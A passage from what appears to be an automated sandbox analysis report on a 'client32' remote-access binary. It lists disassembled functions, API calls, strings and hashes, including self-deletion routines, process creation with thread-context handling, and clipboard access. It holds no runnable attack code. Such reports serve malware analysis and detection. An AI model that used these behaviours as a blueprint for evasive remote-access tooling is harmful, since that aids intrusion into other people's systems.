                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __fsopen
                                                                                                • String ID:
                                                                                                • API String ID: 3646066109-0
                                                                                                • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                                • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                                                Function 00A11000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _NSMClient32@8.PCICL32(?,?,?,00A110A2,00000000), ref: 00A1100B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644020864.0000000000A11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A10000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644017470.0000000000A10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_a10000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Client32@8
                                                                                                • String ID:
                                                                                                • API String ID: 433899448-0
                                                                                                • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                • Instruction ID: 04c16419071c492867824e58ac5f7ae5312449a03cbd9bc3a6534501e21876ec
                                                                                                • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                • Instruction Fuzzy Hash: 98B092B251434D9B8714EE98E941CBB339CAA98600B040809BE0543282CA61FCA09671
                                                                                                Function 69D06D77 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlEncodePointer.NTDLL(00000000,69D0FE32,69D2D878,00000314,00000000,?,?,?,?,?,69D05FD4,69D2D878,Microsoft Visual C++ Runtime Library,00012010), ref: 69D06D79
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID:
                                                                                                • API String ID: 2118026453-0
                                                                                                • Opcode ID: 52dbc25190f2025ad29e56c6d78e11d4e884c1b3f75122c5de280d843c6548e6
                                                                                                • Instruction ID: 6690b892d0b18a12aa1e57c31bd0b69fd6b9023f2f196661a71a6a3dc3fb3408
                                                                                                • Opcode Fuzzy Hash: 52dbc25190f2025ad29e56c6d78e11d4e884c1b3f75122c5de280d843c6548e6
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Function 1116C488 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlEncodePointer.NTDLL(00000000,11178B2B,111F29D8,00000314,00000000,?,?,?,?,?,1116E7EB,111F29D8,Microsoft Visual C++ Runtime Library,00012010), ref: 1116C48A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID:
                                                                                                • API String ID: 2118026453-0
                                                                                                • Opcode ID: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
                                                                                                • Instruction ID: 85178daedb8e135e59ea49443ffa37c172a2f839626d84bfb77205dd36a12bfe
                                                                                                • Opcode Fuzzy Hash: 034736193946d95bcfb76139b375fa58cd735bbaf493e69cf92d6cc7d133de75
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Function 1110F2D0 Relevance: 1.3, APIs: 1, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • InitializeCriticalSection.KERNEL32(0000017C,Client,1102B420,11027AC0,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1110F33F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalInitializeSection_malloc_memsetwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1627046820-0
                                                                                                • Opcode ID: 167354537e07327afa1a8aeaad38a5d06d29b668775e724a074324fe4889291d
                                                                                                • Instruction ID: 00408c7d5724fe509ae1f0f643d2fec4410581e75950b17c3fc13ecd8487adab
                                                                                                • Opcode Fuzzy Hash: 167354537e07327afa1a8aeaad38a5d06d29b668775e724a074324fe4889291d
                                                                                                • Instruction Fuzzy Hash: 4001C4B56047099FC724CF39D880AC7BBF5EB89714F10892EE9AD87340D775A851CB90

                                                                                                Non-executed Functions

                                                                                                Function 111273E0 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 289fileprocessthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 11127400
                                                                                                • _memset.LIBCMT ref: 1112741D
                                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 11127455
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                                                • _strrchr.LIBCMT ref: 111274AA
                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000), ref: 111274E3
                                                                                                • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000), ref: 1112750F
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1112751C
                                                                                                • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000), ref: 11127537
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                                                • wsprintfA.USER32 ref: 11127561
                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                                                • CloseHandle.KERNEL32(?), ref: 1112759E
                                                                                                • CloseHandle.KERNEL32(?), ref: 111275A7
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 111275AA
                                                                                                • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?), ref: 111275E0
                                                                                                • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                                                • DuplicateHandle.KERNEL32 ref: 11127688
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                                                • _strrchr.LIBCMT ref: 111276AB
                                                                                                • _memmove.LIBCMT ref: 11127724
                                                                                                • GetThreadContext.KERNEL32(?,?), ref: 11127744
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                                • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                                • API String ID: 2219718054-800295887
                                                                                                • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                                • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                                                • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                                • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
                                                                                                Function 69CEDBA0 Relevance: 60.2, APIs: 13, Strings: 21, Instructions: 702COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _sprintf$CriticalEnterSection_calloc_memset_strncpy
                                                                                                • String ID: %s|%d$%s|%s|%s|%s|%s|%s|%s|%s$CHANNEL$CHATID$CLASS$CLIENTCOUNT$CLIENT_IP_ADDRESS$CLIENT_NAME$CONTEXT$DEPT$END_CLIENT$FAILED_REASON$HOSTNAME$INACTIVE$MACADDRESS$MORE$PORT$SERVICENAME$SERVICETYPE$STATUS$USER
                                                                                                • API String ID: 2511565166-3216938587
                                                                                                • Opcode ID: 115dc577d70430b9d9cf8bc5749d4b991c21adafab970c8893b7485aac7c73e7
                                                                                                • Instruction ID: 41891a79225e2ae3c45ac7a03f3ba44e361e464c07b8a0d43ea05e693acc681e
                                                                                                • Opcode Fuzzy Hash: 115dc577d70430b9d9cf8bc5749d4b991c21adafab970c8893b7485aac7c73e7
                                                                                                • Instruction Fuzzy Hash: E642BE75D0425A9BDB21CF24AC50BAAB7F0FF45344F04D1E9D88AA7205FB319A89CF91
                                                                                                Function 69CF4F30 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 192sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(00000057), ref: 69CF4F6D
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CF4FE9
                                                                                                • LeaveCriticalSection.KERNEL32 ref: 69CF5002
                                                                                                • _free.LIBCMT ref: 69CF5086
                                                                                                • _free.LIBCMT ref: 69CF50BA
                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF50CB
                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF50E0
                                                                                                • Sleep.KERNEL32(00000014,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF50F2
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF5108
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF5135
                                                                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 69CF513F
                                                                                                • SetLastError.KERNEL32(?), ref: 69CF5154
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$ErrorLast$CountEnterLeaveTick_free$Sleep
                                                                                                • String ID: CMD=GETFILEINFO$GSK=%s$Gateway_Gsk$LINK=%s
                                                                                                • API String ID: 619989478-944126313
                                                                                                • Opcode ID: 1c2b85bcd0051ad3e8fc51dd2d17cab375aa0b067c0206ee927b033f075e5be5
                                                                                                • Instruction ID: 7645ab3d50ebcf742f9c9a773532a42b1e078ff5a06a74858432485936dbf516
                                                                                                • Opcode Fuzzy Hash: 1c2b85bcd0051ad3e8fc51dd2d17cab375aa0b067c0206ee927b033f075e5be5
                                                                                                • Instruction Fuzzy Hash: D661A176D04208AFEB10CFA4DA54BDEB7B4FF45358F50C1A9E605E7280E735AA05CBA1
                                                                                                Function 11033320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                                                • GetClipboardData.USER32 ref: 1103337D
                                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                                                • GetLastError.KERNEL32 ref: 11033406
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                                • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                                • API String ID: 1861668072-1296821031
                                                                                                • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                                • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                                                • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                                • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                                                Function 11089430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(00000000,00001770,0000000A,?,00000000,?,110CF1A6,?), ref: 1108946F
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                                                • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLock
                                                                                                • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                                • API String ID: 2752051264-327499879
                                                                                                • Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                                • Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
                                                                                                • Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                                • Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
                                                                                                Function 69D11CC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,69D1232A,?,69D07F44,?,000000BC,?), ref: 69D11D00
                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,69D1232A,?,69D07F44,?,000000BC,?), ref: 69D11D29
                                                                                                • GetACP.KERNEL32(?,?,69D1232A,?,69D07F44,?,000000BC,?), ref: 69D11D3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: a68b50c6e9e4865af1c1aa2aed220088e9b4e3c378941c1b0c6bada04f1e707f
                                                                                                • Instruction ID: 8399c7584fa2166c39e91cf9e1056149b4b8871f1f7df6a958c5d082797a7d47
                                                                                                • Opcode Fuzzy Hash: a68b50c6e9e4865af1c1aa2aed220088e9b4e3c378941c1b0c6bada04f1e707f
                                                                                                • Instruction Fuzzy Hash: 9701847250D60BFAFB018B60EE15F9E76B8AB11359F208474E601E2880DB60C641C665
                                                                                                Function 69D028E1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 69D08BA8
                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 69D08BBD
                                                                                                • UnhandledExceptionFilter.KERNEL32(69D2427C), ref: 69D08BC8
                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 69D08BE4
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 69D08BEB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
